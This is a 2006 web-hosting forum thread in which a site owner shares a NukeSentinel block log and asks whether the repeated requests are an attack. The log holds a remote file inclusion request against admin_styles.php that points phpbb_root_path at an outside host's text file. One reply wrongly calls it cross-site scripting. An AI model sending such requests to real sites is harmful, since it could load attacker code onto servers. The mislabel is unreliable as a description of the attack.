Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

What is this?
 View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x
Author Message
highlanddesigns
New Member
New Member



Joined: Aug 25, 2005
Posts: 15
PostPosted: Mon Nov 13, 2006 1:04 pm Reply with quote
I got around 30 of these yesterday and the same today...



Date & Time: 2006-11-13 10:55:45 EST GMT -0500
Blocked IP: **.19.**.162
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String:
www.mysite.net/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.ismailyk.gen.tr/lol1.txt?
Get String:
www.mysite.net/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.ismailyk.gen.tr/lol1.txt?
Post String: www.mysite.net/modules/Forums/admin/admin_styles.php
Forwarded For: **.19.***.162
Client IP: none
Remote Address: **.19.***.162
Remote Port: 49647
Request Method: GET


I did not get this until I updated my IP2country. This comes from many different IP addresses. So is this a bug or is somebody trying to hack my site?

Thanks
 
View user's profile Send private message
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom
PostPosted: Mon Nov 13, 2006 1:10 pm Reply with quote
This seems to be happening a lot recently, have a look at this post:

http://www.ravenphpscripts.com/postp87546.html#87546
 
View user's profile Send private message
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
PostPosted: Mon Nov 13, 2006 1:38 pm Reply with quote
Thats a classic XSS attack. The last few versions of Sentinel will detect and block this specific attack (as you have found out).
You may want to consider using HTTPAuth authentication on your admin file as well, details can be found in the forums if you use the search facility.
 
View user's profile Send private message Send e-mail
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©